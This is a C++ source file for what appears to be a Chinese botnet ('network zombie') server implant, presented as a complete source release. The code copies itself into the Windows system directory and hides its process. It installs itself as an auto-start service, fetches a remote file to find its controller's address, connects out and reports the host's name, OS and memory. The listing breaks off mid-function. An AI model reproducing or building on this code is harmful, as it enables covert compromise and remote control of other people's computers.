hdservice.cpp

网络僵尸 服务端完整源代码很好的东西哦

// HDService.cpp : Defines the entry point for the console application.
//
//网络僵尸服务端代码 作者:教主  www.jiaozhu.net
//请保留作者版权
#include "stdafx.h"
#include "HDService.h"
#include "winsock2.h"
#include "winsvc.h"
#include "windows.h"
#include "afxinet.h"
#include "HideProcess.h"
//#include "shellapi.h"


#define WM_SOCKET WM_USER+1000
#define SEQ 0x28376839
#define FAKE_IP "10.156.124.1"		//伪装IP的起始值，本程序的伪装IP覆盖一个B类网段 
#define ServiceName "www.jiaozhu.net"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// The one and only application object

CWinApp theApp;

using namespace std;
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;
SOCKET	sock_client;
char systeminfor[256];
HANDLE ghThread;
HWND hWnd;
BOOL gbIsNT;
char ipfile[256];//ip文件
char installname[256]; //exe文件名称

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

	Readme();
	//::MessageBox(NULL,ipfile,NULL,MB_OK);
	//::MessageBox(NULL,installname,NULL,MB_OK);
	//Readme();
	//return -1;
	//UninstallService();
	//return -1;
	int nRetCode = 0;
	gbIsNT=FALSE;
	//****************************************//自删除
	char CurrDirBuff[256];
	char SysDirBuff[256];
	int DirLen=sizeof(CurrDirBuff);	
	::GetCurrentDirectory(DirLen,CurrDirBuff);
	::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
	//SaveLogToFile("out");
	if (_stricmp(CurrDirBuff,SysDirBuff)!=0)
	{
		//SaveLogToFile("in");
		//::MessageBox(NULL,"winmain",NULL,MB_OK);
		char filename[256];
		char This_File[MAX_PATH];
		strcpy(filename,SysDirBuff);
		strcat(filename,"\\");
		strcat(filename,installname);
		memset(This_File,0,sizeof(This_File));
		GetModuleFileName(NULL, This_File, sizeof(This_File));
		if(::CopyFile(This_File,filename,FALSE)==0)	return -1;
		PROCESS_INFORMATION pinfo;
		STARTUPINFO sinfo;		
		memset(&pinfo,0,sizeof(pinfo));
		memset(&sinfo,0,sizeof(sinfo));	
		//SaveLogToFile("uninstall()");
		uninstall();
		//ShellExecute(NULL,"open",filename,NULL,SysDirBuff,SW_HIDE);
		CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
		//SaveLogToFile("CreateProcess()");
		ExitProcess(0);
	}

	//******************************//创建互斥对象
	//HANDLE hMutex=::CreateMutex(NULL,FALSE,"HDServer");
	//if (GetLastError() == ERROR_ALREADY_EXISTS) return -1;
	//******************************//取操作系统类型
	DWORD dwVersion=::GetVersion();
	// 得到操作系统的版本号
	if(dwVersion >= 0x80000000)
	// 操作系统是Win9x，不是WinNt
	{
		typedef DWORD(CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
		//定义RegisterServiceProcess()函数的原型
		HINSTANCE hDLL;
		LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
		hDLL=LoadLibrary("KERNEL32");
		//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
		lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
		//得到RegisterServiceProcess()函数的地址
		lpRegisterServiceProcess(GetCurrentProcessId(),1);
		//执行RegisterServiceProcess()函数,隐藏本进程
		FreeLibrary(hDLL);
		//卸载动态链接库
	}else
	{
		gbIsNT=TRUE;
	}

	if (gbIsNT)
	{
		//隐藏进程
		HideProcess();
		/*******************************************/
		//服务入口表
		SERVICE_TABLE_ENTRY	service_tab_entry[2];
		service_tab_entry[0].lpServiceName=ServiceName;	//线程名字
		service_tab_entry[0].lpServiceProc=ServiceMain;	//线程入口地址
		//可以有多个线程，最后一个必须为NULL
		service_tab_entry[1].lpServiceName=NULL;
		service_tab_entry[1].lpServiceProc=NULL;
		

		if (StartServiceCtrlDispatcher(service_tab_entry)==0)
		{
				//int i=::GetLastError();
				//char aa[3];								
				//::MessageBox(NULL,itoa(i,aa,10),NULL,MB_OK);
				InstallService();								
		}
		
		
	
		
	}
	else
	{
		start();
	}
	return nRetCode;
}
/***********************************************/
//服务的真正入口点函数
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
	service_status_ss.dwServiceType=SERVICE_WIN32;
	service_status_ss.dwCurrentState=SERVICE_START_PENDING;
	service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
	service_status_ss.dwServiceSpecificExitCode=0;
	service_status_ss.dwWaitHint=0;
	service_status_ss.dwCheckPoint=0;
	service_status_ss.dwWin32ExitCode=0;
	if ((handle_service_status=RegisterServiceCtrlHandler(ServiceName,Handler))==0)
	{
	
		//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
	}//一个服务对应一个控制处理器
	service_status_ss.dwCurrentState=SERVICE_RUNNING;
	service_status_ss.dwWaitHint=0;
	service_status_ss.dwCheckPoint=0;
	::SetServiceStatus(handle_service_status,&service_status_ss);
	
	//::MessageBox(NULL,"start","tell",MB_OK);
	start();

	return ;
}
/***********************************************/
//服务控制器
void WINAPI Handler(DWORD dwControl)
{
		switch(dwControl)
		{
			case SERVICE_CONTROL_STOP:
				service_status_ss.dwCurrentState=SERVICE_STOPPED;
				::SetServiceStatus(handle_service_status,&service_status_ss);
				break;
			case SERVICE_CONTROL_CONTINUE:
				service_status_ss.dwCurrentState=SERVICE_RUNNING;
				::SetServiceStatus(handle_service_status,&service_status_ss);
				break;
			case SERVICE_CONTROL_PAUSE:
				service_status_ss.dwCurrentState=SERVICE_PAUSED;
				::SetServiceStatus(handle_service_status,&service_status_ss);
				break;
			case SERVICE_CONTROL_INTERROGATE:
                  break;
				
		}
		::SetServiceStatus(handle_service_status,&service_status_ss);

}
/***********************************************/
void InstallService()
{
	char szSysDir[256];
	memset(szSysDir,0,sizeof(szSysDir));
	::GetSystemDirectory(szSysDir,sizeof(szSysDir));
	strcat(szSysDir,"\\");
	strcat(szSysDir,installname);
	scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
	if (scm!=NULL)
	{
		

		svc=::CreateService(scm,ServiceName,ServiceName,SERVICE_ALL_ACCESS,
				SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
				SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);

					
		svc=::OpenService(scm,ServiceName,SERVICE_START);	
		if (svc!=NULL)
		{
				 
				
					::StartService(svc,0,NULL);
					::CloseServiceHandle(svc);
				

		}
		::CloseServiceHandle(scm);
	}
	

}

/***********************************************/
void UninstallService()
{
	scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
	if (scm!=NULL)
	{
		svc=::OpenService(scm,ServiceName,SERVICE_ALL_ACCESS);
		if (svc!=NULL)
		{
			::DeleteService(svc);
			::CloseServiceHandle(svc);
		}
	
		::CloseServiceHandle(scm);
	}
	


}
/************************************************/
int start()
{
	int ErrorCode;	
	WSADATA WsaData;
	struct sockaddr_in DestAddr;	//上线地址结构
	char url[256];

	MSG msg;
	WNDCLASS wndc;
	LPSTR szAppName="HDService";
	wndc.style=0;
	wndc.lpfnWndProc=WndProc;
	wndc.cbClsExtra=0;
	wndc.cbWndExtra=0;
	wndc.hInstance=NULL;
	wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
	wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
	wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
	wndc.lpszMenuName=NULL;
	wndc.lpszClassName=szAppName;
	RegisterClass(&wndc);
	hWnd=CreateWindow(szAppName,"HDos",
	WS_OVERLAPPEDWINDOW,
	CW_USEDEFAULT,CW_USEDEFAULT,
	CW_USEDEFAULT,CW_USEDEFAULT,
	NULL,NULL,NULL,NULL);
	ShowWindow(hWnd,SW_HIDE);
	UpdateWindow(hWnd);
	//****************************************
	memset(url,0,sizeof(url));
	strcpy(url,strlwr(ipfile));
	//::MessageBox(NULL,url,NULL,MB_OK);
	//strcpy(url,"http://192.168.1.111/ip.jpg");
	char html[256];					//获取的网页
	char ClientIP[16];				//客户端ip
	char ClientPort[5];				//客户端端口
	char *point;					//指针
	char ComputerName[256];			//计算机名
	char MemorySize[20];			//内存大小
	char SendBuff[256];				//发送缓存
	char OsName[64];				//操作系统类型
	//******************************************
	switch(GetOS())
	{
	case VER_PLATFORM_WIN32_WINDOWS:	
	lstrcpy(OsName,"Windows 9x");
	RegMe();
	break;
	case VER_PLATFORM_WIN32_NT:
	lstrcpy(OsName,"Windows NT/2000/XP");
	break;
	}
	//******************************//取计算机名
	memset(ComputerName,0,sizeof(ComputerName));
	DWORD len=sizeof(ComputerName);
	if ( !GetComputerName(ComputerName,&len)) return -1;
	//******************************//取内存大小
	MEMORYSTATUS mem;
	mem.dwLength=sizeof(mem);
	GlobalMemoryStatus(&mem);
	memset(MemorySize,0,sizeof(MemorySize));
	strcpy(MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,MemorySize,10));
	//******************************//获取网页内容
	
	memset(html,0,sizeof(html));
	strcpy(html,strlwr(GetHttpFile(url)));
	//MessageBox(NULL,html,NULL,MB_OK);
	//*****************************//获取客户端ip和端口
	point=html;
	if(strstr(html,"http://jiaozhu")!=NULL)
	{
			point=point+strlen("http://jiaozhu");
	}
	if(strstr(point,":")!=NULL)
	{
		memset(ClientIP,0,sizeof(ClientIP));
		strncpy(ClientIP,point,strcspn(point,":"));
		point=point+strcspn(point,":")+1;

		if(strstr(point,"end")!=NULL)
		{
		memset(ClientPort,0,sizeof(ClientPort));
		strncpy(ClientPort,point,strcspn(point,"end"));
		}
	}
	//::MessageBox(NULL,ClientIP,NULL,MB_OK);
	//::MessageBox(NULL,ClientPort,NULL,MB_OK);
	//*************************************************
	HANDLE hThread;
	unsigned long uiThreadID=0;
	CLIENTPARA *clientpa;
	try
	{
	if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)
		{
		return -1;		
		}
	sock_client=::socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	if (sock_client==INVALID_SOCKET)
	{
		return -1;
	}
	//上线地址结构
	memset(&DestAddr,0,sizeof(DestAddr)); 
	DestAddr.sin_family=AF_INET; 
	DestAddr.sin_addr.s_addr=inet_addr(ClientIP); 
	DestAddr.sin_port=htons(atoi(ClientPort));
	//while (1)
	{
	
			
			if(connect(sock_client,(sockaddr*)&DestAddr,sizeof(DestAddr))==SOCKET_ERROR )
			{
				Sleep(3000);		
			}
			//连接上线
			memset(SendBuff,0,sizeof(SendBuff));
			strcat(SendBuff,"<CMD>000</CMD><CPNAME>");
			strcat(SendBuff,ComputerName);
			strcat(SendBuff,"</CPNAME><OSNAME>");
			strcat(SendBuff,OsName);
			strcat(SendBuff,"</OSNAME><MEM>");
			strcat(SendBuff,MemorySize);
			strcat(SendBuff,"</MEM>");
			strcat(SendBuff,"\r\n");
			memset(systeminfor,0,sizeof(systeminfor));
			strcpy(systeminfor,SendBuff);
			if (SOCKET_ERROR!=send(sock_client,SendBuff,sizeof(SendBuff),0))
			{